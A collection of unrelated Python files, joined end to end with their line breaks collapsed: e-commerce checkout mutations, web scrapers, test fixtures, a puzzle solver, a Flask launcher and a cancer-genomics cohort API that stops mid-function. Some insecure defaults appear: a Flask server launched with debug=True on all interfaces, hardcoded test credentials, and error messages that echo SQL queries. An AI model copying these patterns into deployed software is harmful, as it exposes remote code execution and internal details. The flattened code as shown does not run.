change_billing_address_in_cart(checkout, billing_address) return CheckoutShippingAddressUpdate(checkout=checkout, errors=errors) class CheckoutEmailUpdate(BaseMutation): checkout = graphene.Field(Checkout, description='An updated checkout') class Arguments: checkout_id = graphene.ID(description='Checkout ID') email = graphene.String(required=True, description='email') class Meta: description = 'Updates email address in the existing Checkout object.' @classmethod def mutate(cls, root, info, checkout_id, email): errors = [] checkout = cls.get_node_or_error( info, checkout_id, errors, 'checkout_id', only_type=Checkout) if checkout is not None: checkout.email = email checkout.save(update_fields=['email']) return CheckoutEmailUpdate(checkout=checkout, errors=errors) class CheckoutShippingMethodUpdate(BaseMutation): checkout = graphene.Field(Checkout, description='An updated checkout') class Arguments: checkout_id = graphene.ID(description='Checkout ID') shipping_method_id = graphene.ID( required=True, description='Shipping method') class Meta: description = 'Updates the shipping address of the checkout.' @classmethod def mutate(cls, root, info, checkout_id, shipping_method_id): errors = [] checkout = cls.get_node_or_error( info, checkout_id, errors, 'checkout_id', only_type=Checkout) shipping_method = cls.get_node_or_error( info, shipping_method_id, errors, 'shipping_method_id', only_type=ShippingMethod) if checkout is not None and shipping_method: clean_shipping_method( checkout, shipping_method, errors, info.context.discounts, info.context.taxes, remove=False) if errors: return CheckoutShippingMethodUpdate(errors=errors) checkout.shipping_method = shipping_method checkout.save(update_fields=['shipping_method']) return CheckoutShippingMethodUpdate(checkout=checkout, errors=errors) class CheckoutComplete(BaseMutation): order = graphene.Field(Order, description='Placed order') class Arguments: checkout_id = graphene.ID(description='Checkout ID') class Meta: description = ( 'Completes the checkout, creates an order from it and ' 'charges the customer\'s funding source.') @classmethod def mutate(cls, root, info, checkout_id): errors = [] checkout = cls.get_node_or_error( info, checkout_id, errors, 'checkout_id', only_type=Checkout) if checkout is None: return CheckoutComplete(errors=errors) taxes = get_taxes_for_cart(checkout, info.context.taxes) ready, checkout_error = ready_to_place_order( checkout, taxes, info.context.discounts) if not ready: cls.add_error(field=None, message=checkout_error, errors=errors) return CheckoutComplete(errors=errors) try: order = create_order( cart=checkout, tracking_code=analytics.get_client_id(info.context), discounts=info.context.discounts, taxes=taxes) except InsufficientStock: order = None cls.add_error( field=None, message='Insufficient product stock.', errors=errors) payment = checkout.payments.filter(is_active=True).first() # FIXME there could be a situation where order was created but payment # failed. we should cancel/delete the order at this moment I think # authorize payment try: gateway_authorize(payment, payment.token) except PaymentError as exc: msg = str(exc) cls.add_error(field=None, message=msg, errors=errors) return CheckoutComplete(order=order, errors=errors) # capture payment try: gateway_capture(payment, payment.total) except PaymentError as exc: msg = str(exc) cls.add_error(field=None, message=msg, errors=errors) # Void payment if the capture failed gateway_void(payment) return CheckoutComplete(order=order, errors=errors)
from vpngate import VPNGate from datetime import datetime # Edit it to use with mirror site vpngate_base_url = "https://www.vpngate.net" # csv output file csv_file_path = "output/udp" sleep_time = 0 vpngate = VPNGate(vpngate_base_url, csv_file_path, sleep_time) start_time = datetime.now() print("Script start at: {0}\n".format(start_time)) vpngate.run() end_time = datetime.now() print("Script finish at: {0}\n".format(end_time)) running_time = end_time - start_time print("Running in {0} seconds".format(running_time.total_seconds()))
from danniesMovies.wsgi import application
from BiomeSettings import biomeSettings from BiomeMapping import biome_map # gets the name of the biome, if the biome is not supported, returns 'Plains' biome def get_biome_name(biome): for key, value in biome_map.items(): if biome in value: return key return 'Plains' # getters for various biome specific blocks def get_wall_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['wall'] def get_floor_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['floor'] def get_fence_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['fence'] def get_road_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['road'] def get_door_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['door'] def get_window_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['window'] def get_beam_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['beam'] def get_hedge_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['hedge'] def get_roof_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['roof'] def get_crop_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['crop'] def get_soil_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['soil'] def get_bridge_block(biome=1): biomeName = get_biome_name(biome) return biomeSettings[biomeName]['bridge']
from enum import Enum class HelpMessages(Enum): ADD = 'Add ' CONTRIBUTING_FILE = 'a standart Contributing File'
# import torch.nn as nn # # from ...ops.pointnet2.pointnet2_stack import pointnet2_modules as pointnet2_stack_modules # from ...utils import common_utils # from .roi_head_template import RoIHeadTemplate # # # class PVRCNNHead(RoIHeadTemplate): # def __init__(self, input_channels, model_cfg, num_class=1): # super().__init__(num_class=num_class, model_cfg=model_cfg) # self.model_cfg = model_cfg # # mlps = self.model_cfg.ROI_GRID_POOL.MLPS # for k in range(len(mlps)): # mlps[k] = [input_channels] + mlps[k] # # self.roi_grid_pool_layer = pointnet2_stack_modules.StackSAModuleMSG( # radii=self.model_cfg.ROI_GRID_POOL.POOL_RADIUS, # nsamples=self.model_cfg.ROI_GRID_POOL.NSAMPLE, # mlps=mlps, # use_xyz=True, # pool_method=self.model_cfg.ROI_GRID_POOL.POOL_METHOD, # ) # # GRID_SIZE = self.model_cfg.ROI_GRID_POOL.GRID_SIZE # c_out = sum([x[-1] for x in mlps]) # pre_channel = GRID_SIZE * GRID_SIZE * GRID_SIZE * c_out # # shared_fc_list = [] # for k in range(0, self.model_cfg.SHARED_FC.__len__()): # shared_fc_list.extend([ # nn.Conv1d(pre_channel, self.model_cfg.SHARED_FC[k], kernel_size=1, bias=False), # nn.BatchNorm1d(self.model_cfg.SHARED_FC[k]), # nn.ReLU() # ]) # pre_channel = self.model_cfg.SHARED_FC[k] # # if k != self.model_cfg.SHARED_FC.__len__() - 1 and self.model_cfg.DP_RATIO > 0: # shared_fc_list.append(nn.Dropout(self.model_cfg.DP_RATIO)) # # self.shared_fc_layer = nn.Sequential(*shared_fc_list) # # self.cls_layers = self.make_fc_layers( # input_channels=pre_channel, output_channels=self.num_class, fc_list=self.model_cfg.CLS_FC # ) # self.reg_layers = self.make_fc_layers( # input_channels=pre_channel, # output_channels=self.box_coder.code_size * self.num_class, # fc_list=self.model_cfg.REG_FC # ) # self.init_weights(weight_init='xavier') # # def init_weights(self, weight_init='xavier'): # if weight_init == 'kaiming': # init_func = nn.init.kaiming_normal_ # elif weight_init == 'xavier': # init_func = nn.init.xavier_normal_ # elif weight_init == 'normal': # init_func = nn.init.normal_ # else: # raise NotImplementedError # # for m in self.modules(): # if isinstance(m, nn.Conv2d) or isinstance(m, nn.Conv1d): # if weight_init == 'normal': # init_func(m.weight, mean=0, std=0.001) # else: # init_func(m.weight) # if m.bias is not None: # nn.init.constant_(m.bias, 0) # nn.init.normal_(self.reg_layers[-1].weight, mean=0, std=0.001) # # def roi_grid_pool(self, batch_dict): # """ # Args: # batch_dict: # batch_size: # rois: (B, num_rois, 7 + C) # point_coords: (num_points, 4) [bs_idx, x, y, z] # point_features: (num_points, C) # point_cls_scores: (N1 + N2 + N3 + ..., 1) # point_part_offset: (N1 + N2 + N3 + ..., 3) # Returns: # # """ # batch_size = batch_dict['batch_size'] # rois = batch_dict['rois'] # point_coords = batch_dict['point_coords'] # point_features = batch_dict['point_features'] # # point_features = point_features * batch_dict['point_cls_scores'].view(-1, 1) # # global_roi_grid_points, local_roi_grid_points = self.get_global_grid_points_of_roi( # rois, grid_size=self.model_cfg.ROI_GRID_POOL.GRID_SIZE # ) # (BxN, 6x6x6, 3) # global_roi_grid_points = global_roi_grid_points.view(batch_size, -1, 3) # (B, Nx6x6x6, 3) # # xyz = point_coords[:, 1:4] # xyz_batch_cnt = xyz.new_zeros(batch_size).int() # batch_idx = point_coords[:, 0] # for k in range(batch_size): # xyz_batch_cnt[k] = (batch_idx == k).sum() # # new_xyz = global_roi_grid_points.view(-1, 3) # new_xyz_batch_cnt = xyz.new_zeros(batch_size).int().fill_(global_roi_grid_points.shape[1]) # pooled_points, pooled_features = self.roi_grid_pool_layer( # xyz=xyz.contiguous(), # xyz_batch_cnt=xyz_batch_cnt, # new_xyz=new_xyz, # new_xyz_batch_cnt=new_xyz_batch_cnt, # features=point_features.contiguous(), # ) # (M1 + M2 ..., C) # # pooled_features = pooled_features.view( # -1, self.model_cfg.ROI_GRID_POOL.GRID_SIZE ** 3, # pooled_features.shape[-1] # ) # (BxN, 6x6x6, C) # return pooled_features # # def get_global_grid_points_of_roi(self, rois, grid_size): # rois = rois.view(-1, rois.shape[-1]) # batch_size_rcnn = rois.shape[0] # # local_roi_grid_points = self.get_dense_grid_points(rois, batch_size_rcnn, grid_size) # (B, 6x6x6, 3) # global_roi_grid_points = common_utils.rotate_points_along_z( # local_roi_grid_points.clone(), rois[:, 6] # ).squeeze(dim=1) # global_center = rois[:, 0:3].clone() # global_roi_grid_points += global_center.unsqueeze(dim=1) # return global_roi_grid_points, local_roi_grid_points # # @staticmethod # def get_dense_grid_points(rois, batch_size_rcnn, grid_size): # faked_features = rois.new_ones((grid_size, grid_size, grid_size)) # dense_idx = faked_features.nonzero() # (N, 3) [x_idx, y_idx, z_idx] # dense_idx = dense_idx.repeat(batch_size_rcnn, 1, 1).float() # (B, 6x6x6, 3) # # local_roi_size = rois.view(batch_size_rcnn, -1)[:, 3:6] # roi_grid_points = (dense_idx + 0.5) / grid_size * local_roi_size.unsqueeze(dim=1) \ # - (local_roi_size.unsqueeze(dim=1) / 2) # (B, 6x6x6, 3) # return roi_grid_points # # def forward(self, batch_dict): # """ # :param input_data: input dict # :return: # """ # # targets_dict = self.proposal_layer( # batch_dict, nms_config=self.model_cfg.NMS_CONFIG['TRAIN' if self.training else 'TEST'] # ) # if self.training: # targets_dict = self.assign_targets(batch_dict) # batch_dict['rois'] = targets_dict['rois'] # batch_dict['roi_labels'] = targets_dict['roi_labels'] # # # RoI aware pooling # pooled_features = self.roi_grid_pool(batch_dict) # (BxN, 6x6x6, C) # # grid_size = self.model_cfg.ROI_GRID_POOL.GRID_SIZE # batch_size_rcnn = pooled_features.shape[0] # pooled_features = pooled_features.permute(0, 2, 1).\ # contiguous().view(batch_size_rcnn, -1, grid_size, grid_size, grid_size) # (BxN, C, 6, 6, 6) # # shared_features = self.shared_fc_layer(pooled_features.view(batch_size_rcnn, -1, 1)) # rcnn_cls = self.cls_layers(shared_features).transpose(1, 2).contiguous().squeeze(dim=1) # (B, 1 or 2) # rcnn_reg = self.reg_layers(shared_features).transpose(1, 2).contiguous().squeeze(dim=1) # (B, C) # # if not self.training: # batch_cls_preds, batch_box_preds = self.generate_predicted_boxes( # batch_size=batch_dict['batch_size'], rois=batch_dict['rois'], cls_preds=rcnn_cls, box_preds=rcnn_reg # ) # batch_dict['batch_cls_preds'] = batch_cls_preds # batch_dict['batch_box_preds'] = batch_box_preds # batch_dict['cls_preds_normalized'] = False # else: # targets_dict['rcnn_cls'] = rcnn_cls # targets_dict['rcnn_reg'] = rcnn_reg # # self.forward_ret_dict = targets_dict # # return batch_dict
import requests from bs4 import BeautifulSoup as soup import re import urllib3 import urllib import time # url = 'https://film-grab.com/category/1-371/' #4 # url = 'https://film-grab.com/category/2-001/' #1 # url = 'https://film-grab.com/category/2-201/' #1 # url = 'https://film-grab.com/category/1-751/' #1 # url = 'https://film-grab.com/category/2-351/' # 12 #url = 'https://film-grab.com/category/1-661/' #3 #url = 'https://film-grab.com/category/1-781/' #1 url = 'https://film-grab.com/category/1-851/' #12 def source_img(url): links = [] for x in range(1, 13, 1): txt = url+'page/'+str(x)+'/' links.append(txt) links[0] = url # links.append(url) # for singe processing use this line and comment out the for loop for l in links: page = requests.get(l) html = soup(page.text, 'html.parser') result = html.find_all(attrs={'class':'popup-image'}) result[0].find_all('img')[0].get('data-large-file') img_links = [] title = [] for each in result: img_links.append(each.find_all('img')[0].get('data-large-file')) title.append(each.find_all('img')[0].get('data-image-title')) for url in img_links: filename = url.split('/')[-1] r = requests.get(url, allow_redirects=True) time.sleep(3) open('images/movie_pics/'+filename, 'wb').write(r.content) source_img(url)
#!/usr/bin/env python # -*- coding: utf-8 -*- """Common fixtures and utils for unittests and functional tests.""" import os from pymongo import MongoClient import pytest import yaml from orion.algo.base import (BaseAlgorithm, OptimizationAlgorithm) class DumbAlgo(BaseAlgorithm): """Stab class for `BaseAlgorithm`.""" def __init__(self, space, value=5, scoring=0, judgement=None, suspend=False, done=False, **nested_algo): """Configure returns, allow for variable variables.""" self._times_called_suspend = 0 self._times_called_is_done = 0 self._num = None self._points = None self._results = None self._score_point = None self._judge_point = None self._measurements = None super(DumbAlgo, self).__init__(space, value=value, scoring=scoring, judgement=judgement, suspend=suspend, done=done, **nested_algo) def suggest(self, num=1): """Suggest based on `value`.""" self._num = num return [self.value] * num def observe(self, points, results): """Log inputs.""" self._points = points self._results = results def score(self, point): """Log and return stab.""" self._score_point = point return self.scoring def judge(self, point, measurements): """Log and return stab.""" self._judge_point = point self._measurements = measurements return self.judgement @property def should_suspend(self): """Cound how many times it has been called and return `suspend`.""" self._times_called_suspend += 1 return self.suspend @property def is_done(self): """Cound how many times it has been called and return `done`.""" self._times_called_is_done += 1 return self.done # Hack it into being discoverable OptimizationAlgorithm.types.append(DumbAlgo) OptimizationAlgorithm.typenames.append(DumbAlgo.__name__.lower()) @pytest.fixture(scope='session') def dumbalgo(): """Return stab algorithm class.""" return DumbAlgo @pytest.fixture() def exp_config(): """Load an example database.""" with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'experiment.yaml')) as f: exp_config = list(yaml.safe_load_all(f)) return exp_config @pytest.fixture(scope='session') def database(): """Return Mongo database object to test with example entries.""" client = MongoClient(username='user', password='pass', authSource='orion_test') database = client.orion_test yield database client.close() @pytest.fixture() def clean_db(database, exp_config): """Clean insert example experiment entries to collections.""" database.experiments.drop() database.trials.drop() database.workers.drop() database.resources.drop() @pytest.fixture() def only_experiments_db(database, exp_config): """Clean the database and insert only experiments.""" database.experiments.drop() database.experiments.insert_many(exp_config[0]) database.trials.drop() database.workers.drop() database.resources.drop()
import time import os class Policy: def __init__(self, n1: int, n2: int, letter: str): assert(n1 < n2) self.n1 = n1 self.n2 = n2 self.letter = letter class Password: def __init__(self, policy: Policy, password: str): self.policy = policy self.password = password def validate_rule_1(self) -> bool: # Password should contain the letter at least n1 times and at most n2 times. count = self.password.count(self.policy.letter) return (count >= self.policy.n1) and (count <= self.policy.n2) # Why not do this?: # return self.password.count(self.policy.letter) in range(self.policy.n1, self.policy.n2 + 1) # Put simply: it's slower. Which makes sense if you think about possible ways Python could implement the check. # That said, it's negligible at the size of the real input: # It was about about 2 seconds slower over 10,000 iterations of the entire input file. def validate_rule_2(self) -> bool: # Password should contain the letter in exactly 1 of locations n1 and n2. # We have to account for these passwords being 1-indexed in the policy. return (self.password[self.policy.n1 - 1] == self.policy.letter) \ ^ (self.password[self.policy.n2 - 1] == self.policy.letter) # ^ (xor) and != will give same result. def parse_input(filename: str): passwords: list[Password] = [] with open(filename, "r") as file: for line in file: line = line.strip().split(": ") policy = line[0].split(" ") policy_nums = policy[0].split("-") passwords.append(Password(Policy(int(policy_nums[0]), int(policy_nums[1]), policy[1]), line[1])) return passwords def main(input_filename: str): start_time = time.time() passwords = parse_input(input_filename) part1_start = time.time() passing_policy = 0 for password in passwords: passing_policy += password.validate_rule_1() print(f"Part 1: {passing_policy} passwords passed policy 1.") part2_start = time.time() passing_policy = 0 for password in passwords: passing_policy += password.validate_rule_2() print(f"Part 2: {passing_policy} passwords passed policy 2.") end_time = time.time() print("Elapsed Time:") print(f" Parsing: {(part1_start - start_time) * 1000:.2f} ms") print(f" Part 1: {(part2_start - part1_start) * 1000:.2f} ms") print(f" Part 2: {(end_time - part2_start) * 1000:.2f} ms") print(f" Total: {(end_time - start_time) * 1000:.2f} ms") return if __name__ == "__main__": os.chdir(os.path.split(__file__)[0]) main("../../inputs/2020/day02.txt")
from django.apps import AppConfig class AzdiliConfig(AppConfig): name = 'azdili'
#!flask/bin/python from app import app app.run(host="0.0.0.0", port=80, debug=True, threaded=True)
import sys import time import vcgencmd from vcgencmd import Vcgencmd if len(sys.argv) == 1: logging.critical("No screen_id specified") sys.exit(1) screen_id = int(sys.argv[1]) def turn_off_screen(): print('turning off screen') vcgm = Vcgencmd() output = vcgm.display_power_off(screen_id) def turn_on_screen(): print('turning on screen') vcgm = Vcgencmd() output = vcgm.display_power_on(screen_id) vcgm = Vcgencmd() for x in [0,1,2,3,7]: print('{}: {}'.format(x, vcgm.display_power_state(x))) turn_off_screen() time.sleep(5) turn_on_screen() time.sleep(5) turn_off_screen() time.sleep(5) turn_on_screen()
""" Copyright 2015, Institute for Systems Biology Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import logging from datetime import datetime import endpoints from protorpc import messages, message_types from protorpc import remote from django.conf import settings from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned from django.contrib.auth.models import User as Django_User from django.core.signals import request_finished import django import MySQLdb import json from metadata import MetadataItem, IncomingMetadataItem from cohorts.models import Cohort as Django_Cohort, Cohort_Perms, Patients, Samples, Filters from bq_data_access.cohort_bigquery import BigQueryCohortSupport from api_helpers import * logger = logging.getLogger(__name__) INSTALLED_APP_CLIENT_ID = settings.INSTALLED_APP_CLIENT_ID CONTROLLED_ACL_GOOGLE_GROUP = settings.ACL_GOOGLE_GROUP DEFAULT_COHORT_NAME = 'Untitled Cohort' IMPORTANT_FEATURES = [ 'tumor_tissue_site', 'gender', 'vital_status', 'country', 'Study', 'age_at_initial_pathologic_diagnosis', 'TP53', 'RB1', 'NF1', 'APC', 'CTNNB1', 'PIK3CA', 'PTEN', 'FBXW7', 'NRAS', 'ARID1A', 'CDKN2A', 'SMAD4', 'BRAF', 'NFE2L2', 'IDH1', 'PIK3R1', 'HRAS', 'EGFR', 'BAP1', 'KRAS', 'DNAseq_data', 'mirnPlatform', 'cnvrPlatform', 'methPlatform', 'gexpPlatform', 'rppaPlatform' ] BUILTIN_ENDPOINTS_PARAMETERS = [ 'alt', 'fields', 'enum', 'enumDescriptions', 'key', 'oauth_token', 'prettyPrint', 'quotaUser', 'userIp' ] class ReturnJSON(messages.Message): msg = messages.StringField(1) class FilterDetails(messages.Message): name = messages.StringField(1) value = messages.StringField(2) class Cohort(messages.Message): id = messages.StringField(1) name = messages.StringField(2) last_date_saved = messages.StringField(3) perm = messages.StringField(4) email = messages.StringField(5) comments = messages.StringField(6) source_type = messages.StringField(7) source_notes = messages.StringField(8) parent_id = messages.IntegerField(9) filters = messages.MessageField(FilterDetails, 10, repeated=True) num_patients = messages.StringField(11) num_samples = messages.StringField(12) class CohortsList(messages.Message): items = messages.MessageField(Cohort, 1, repeated=True) count = messages.IntegerField(2) class CohortPatientsSamplesList(messages.Message): patients = messages.StringField(1, repeated=True) patient_count = messages.IntegerField(2) samples = messages.StringField(3, repeated=True) sample_count = messages.IntegerField(4) cohort_id = messages.IntegerField(5) class PatientDetails(messages.Message): clinical_data = messages.MessageField(MetadataItem, 1) samples = messages.StringField(2, repeated=True) aliquots = messages.StringField(3, repeated=True) class DataDetails(messages.Message): SampleBarcode = messages.StringField(1) DataCenterName = messages.StringField(2) DataCenterType = messages.StringField(3) DataFileName = messages.StringField(4) DataFileNameKey = messages.StringField(5) DatafileUploaded = messages.StringField(6) DataLevel = messages.StringField(7) Datatype = messages.StringField(8) GenomeReference = messages.StringField(9) GG_dataset_id = messages.StringField(10) GG_readgroupset_id = messages.StringField(11) Pipeline = messages.StringField(12) Platform = messages.StringField(13) platform_full_name = messages.StringField(14) Project = messages.StringField(15) Repository = messages.StringField(16) SDRFFileName = messages.StringField(17) SecurityProtocol = messages.StringField(18) CloudStoragePath = messages.StringField(19) class SampleDetails(messages.Message): biospecimen_data = messages.MessageField(MetadataItem, 1) aliquots = messages.StringField(2, repeated=True) patient = messages.StringField(3) data_details = messages.MessageField(DataDetails, 4, repeated=True) data_details_count = messages.IntegerField(5) error = messages.StringField(6) class DataFileNameKeyList(messages.Message): datafilenamekeys = messages.StringField(1, repeated=True) count = messages.IntegerField(2) class GoogleGenomicsItem(messages.Message): SampleBarcode = messages.StringField(1) GG_dataset_id = messages.StringField(2) GG_readgroupset_id = messages.StringField(3) class GoogleGenomicsList(messages.Message): items = messages.MessageField(GoogleGenomicsItem, 1, repeated=True) count = messages.IntegerField(2) def are_there_bad_keys(request): ''' Checks for unrecognized fields in an endpoint request :param request: the request object from the endpoint :return: boolean indicating True if bad (unrecognized) fields are present in the request ''' unrecognized_param_dict = { k: request.get_unrecognized_field_info(k)[0] for k in request.all_unrecognized_fields() if k not in BUILTIN_ENDPOINTS_PARAMETERS } return unrecognized_param_dict != {} def are_there_no_acceptable_keys(request): ''' Checks for a lack of recognized fields in an endpoints request. Used in save_cohort and preview_cohort endpoints. :param request: the request object from the endpoint :return: boolean indicating True if there are no recognized fields in the request. ''' param_dict = { k.name: request.get_assigned_value(k.name) for k in request.all_fields() if request.get_assigned_value(k.name) } return param_dict == {} def construct_parameter_error_message(request, filter_required): err_msg = '' sorted_acceptable_keys = sorted([k.name for k in request.all_fields()], key=lambda s: s.lower()) unrecognized_param_dict = { k: request.get_unrecognized_field_info(k)[0] for k in request.all_unrecognized_fields() if k not in BUILTIN_ENDPOINTS_PARAMETERS } if unrecognized_param_dict: bad_key_str = "'" + "', '".join(unrecognized_param_dict.keys()) + "'" err_msg += "The following filters were not recognized: {}. ".format(bad_key_str) if filter_required: err_msg += "You must specify at least one of the following " \ "case-sensitive filters: {}".format(sorted_acceptable_keys) else: err_msg += "Acceptable filters are: {}".format(sorted_acceptable_keys) return err_msg Cohort_Endpoints = endpoints.api(name='cohort_api', version='v1', description="Get information about " "cohorts, patients, and samples. Create and delete cohorts.", allowed_client_ids=[INSTALLED_APP_CLIENT_ID, endpoints.API_EXPLORER_CLIENT_ID]) @Cohort_Endpoints.api_class(resource_name='cohort_endpoints') class Cohort_Endpoints_API(remote.Service): GET_RESOURCE = endpoints.ResourceContainer(token=messages.StringField(1), cohort_id=messages.IntegerField(2)) @endpoints.method(GET_RESOURCE, CohortsList, path='cohorts_list', http_method='GET', name='cohorts.list') def cohorts_list(self, request): ''' Returns information about cohorts a user has either READER or OWNER permission on. Authentication is required. Optionally takes a cohort id as a parameter to only list information about one cohort. ''' user_email = None cursor = None filter_cursor = None db = None if endpoints.get_current_user() is not None: user_email = endpoints.get_current_user().email() # users have the option of pasting the access token in the query string # or in the 'token' field in the api explorer # but this is not required access_token = request.get_assigned_value('token') if access_token: user_email = get_user_email_from_token(access_token) cohort_id = request.get_assigned_value('cohort_id') if user_email: django.setup() try: user_id = Django_User.objects.get(email=user_email).id except (ObjectDoesNotExist, MultipleObjectsReturned), e: logger.warn(e) raise endpoints.NotFoundException("%s does not have an entry in the user database." % user_email) query_dict = {'cohorts_cohort_perms.user_id': user_id, 'cohorts_cohort.active': unicode('1')} if cohort_id: query_dict['cohorts_cohort.id'] = cohort_id query_str = 'select cohorts_cohort.id, ' \ 'cohorts_cohort.name, ' \ 'cohorts_cohort.last_date_saved, ' \ 'cohorts_cohort_perms.perm, ' \ 'auth_user.email, ' \ 'cohorts_cohort_comments.content as comments, ' \ 'cohorts_source.type as source_type, ' \ 'cohorts_source.notes as source_notes, ' \ 'cohorts_source.parent_id ' \ 'from cohorts_cohort_perms ' \ 'join cohorts_cohort ' \ 'on cohorts_cohort.id=cohorts_cohort_perms.cohort_id ' \ 'join auth_user ' \ 'on auth_user.id=cohorts_cohort_perms.user_id ' \ 'left join cohorts_cohort_comments ' \ 'on cohorts_cohort_comments.user_id=cohorts_cohort_perms.user_id ' \ 'left join cohorts_source ' \ 'on cohorts_source.cohort_id=cohorts_cohort_perms.cohort_id ' query_tuple = () if query_dict: query_str += ' where ' + '=%s and '.join(key for key in query_dict.keys()) + '=%s' query_tuple = tuple(value for value in query_dict.values()) filter_query_str = '' row = None try: db = sql_connection() cursor = db.cursor(MySQLdb.cursors.DictCursor) cursor.execute(query_str, query_tuple) data = [] for row in cursor.fetchall(): filter_query_str = 'SELECT name, value ' \ 'FROM cohorts_filters ' \ 'WHERE cohorts_filters.resulting_cohort_id=%s' filter_cursor = db.cursor(MySQLdb.cursors.DictCursor) filter_cursor.execute(filter_query_str, (str(row['id']),)) filter_data = [] for filter_row in filter_cursor.fetchall(): filter_data.append(FilterDetails( name=str(filter_row['name']), value=str(filter_row['value']) )) data.append(Cohort( id=str(row['id']), name=str(row['name']), last_date_saved=str(row['last_date_saved']), perm=str(row['perm']), email=str(row['email']), comments=str(row['comments']), source_type=None if row['source_type'] is None else str(row['source_type']), source_notes=None if row['source_notes'] is None else str(row['source_notes']), parent_id=None if row['parent_id'] is None else int(row['parent_id']), filters=filter_data )) return CohortsList(items=data, count=len(data)) except (IndexError, TypeError) as e: raise endpoints.NotFoundException( "User {}'s cohorts not found. {}: {}".format(user_email, type(e), e)) except MySQLdb.ProgrammingError as e: msg = '{}:\n\tcohort query: {} {}\n\tfilter query: {} {}'\ .format(e, query_str, query_tuple, filter_query_str, str(row)) logger.warn(msg) raise endpoints.BadRequestException("Error retrieving cohorts or filters. {}".format(msg)) finally: if cursor: cursor.close() if filter_cursor: filter_cursor.close() if db and db.open: db.close() request_finished.send(self) else: raise endpoints.UnauthorizedException("Authentication failed.") GET_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True), token=messages.StringField(2)) @endpoints.method(GET_RESOURCE, CohortPatientsSamplesList, path='cohort_patients_samples_list', http_method='GET', name='cohorts.cohort_patients_samples_list') def cohort_patients_samples_list(self, request): """ Takes a cohort id as a required parameter and returns information about the participants and samples in a particular cohort. Authentication is required. User must have either READER or OWNER permissions on the cohort. """ db = None cursor = None user_email = None if endpoints.get_current_user() is not None: user_email = endpoints.get_current_user().email() # users have the option of pasting the access token in the query string # or in the 'token' field in the api explorer # but this is not required access_token = request.get_assigned_value('token') if access_token: user_email = get_user_email_from_token(access_token) cohort_id = request.get_assigned_value('cohort_id') if user_email: django.setup() try: user_id = Django_User.objects.get(email=user_email).id except (ObjectDoesNotExist, MultipleObjectsReturned), e: logger.warn(e) request_finished.send(self) raise endpoints.UnauthorizedException("%s does not have an entry in the user database." % user_email) cohort_perms_query = "select count(*) from cohorts_cohort_perms where user_id=%s and cohort_id=%s" cohort_perms_tuple = (user_id, cohort_id) cohort_query = "select count(*) from cohorts_cohort where id=%s and active=%s" cohort_tuple = (cohort_id, unicode('0')) try: db = sql_connection() cursor = db.cursor(MySQLdb.cursors.DictCursor) cursor.execute(cohort_perms_query, cohort_perms_tuple) result = cursor.fetchone() if int(result['count(*)']) == 0: error_message = "{} does not have owner or reader permissions on cohort {}.".format(user_email, cohort_id) request_finished.send(self) raise endpoints.ForbiddenException(error_message) cursor.execute(cohort_query, cohort_tuple) result = cursor.fetchone() if int(result['count(*)']) > 0: error_message = "Cohort {} was deleted.".format(cohort_id) request_finished.send(self) raise endpoints.NotFoundException(error_message) except (IndexError, TypeError) as e: logger.warn(e) raise endpoints.NotFoundException("Cohort {} not found.".format(cohort_id)) except MySQLdb.ProgrammingError as e: msg = '{}:\n\tcohort permissions query: {} {}\n\tcohort query: {} {}'\ .format(e, cohort_perms_query, cohort_perms_tuple, cohort_query, cohort_tuple) logger.warn(msg) raise endpoints.BadRequestException("Error retrieving cohorts or cohort permissions. {}".format(msg)) finally: if cursor: cursor.close() if db and db.open: db.close() request_finished.send(self) patient_query_str = 'select cohorts_patients.patient_id ' \ 'from cohorts_patients ' \ 'inner join cohorts_cohort_perms ' \ 'on cohorts_cohort_perms.cohort_id=cohorts_patients.cohort_id ' \ 'inner join cohorts_cohort ' \ 'on cohorts_patients.cohort_id=cohorts_cohort.id ' \ 'where cohorts_patients.cohort_id=%s ' \ 'and cohorts_cohort_perms.user_id=%s ' \ 'and cohorts_cohort.active=%s ' \ 'group by cohorts_patients.patient_id ' patient_query_tuple = (cohort_id, user_id, unicode('1')) sample_query_str = 'select cohorts_samples.sample_id ' \ 'from cohorts_samples ' \ 'inner join cohorts_cohort_perms ' \ 'on cohorts_cohort_perms.cohort_id=cohorts_samples.cohort_id ' \ 'inner join cohorts_cohort ' \ 'on cohorts_samples.cohort_id=cohorts_cohort.id ' \ 'where cohorts_samples.cohort_id=%s ' \ 'and cohorts_cohort_perms.user_id=%s ' \ 'and cohorts_cohort.active=%s ' \ 'group by cohorts_samples.sample_id ' sample_query_tuple = (cohort_id, user_id, unicode('1')) try: db = sql_connection() cursor = db.cursor(MySQLdb.cursors.DictCursor) cursor.execute(patient_query_str, patient_query_tuple) patient_data = [] for row in cursor.fetchall(): patient_data.append(row['patient_id']) cursor.execute(sample_query_str, sample_query_tuple) sample_data = [] for row in cursor.fetchall(): sample_data.append(row['sample_id']) return CohortPatientsSamplesList(patients=patient_data, patient_count=len(patient_data), samples=sample_data, sample_count=len(sample_data), cohort_id=int(cohort_id)) except (IndexError, TypeError) as e: logger.warn(e) raise endpoints.NotFoundException("Cohort {} not found.".format(cohort_id)) except MySQLdb.ProgrammingError as e: msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}'\ .format(e, patient_query_str, patient_query_tuple, sample_query_str, sample_query_tuple) logger.warn(msg) raise endpoints.BadRequestException("Error retrieving patients or samples. {}".format(msg)) finally: if cursor: cursor.close() 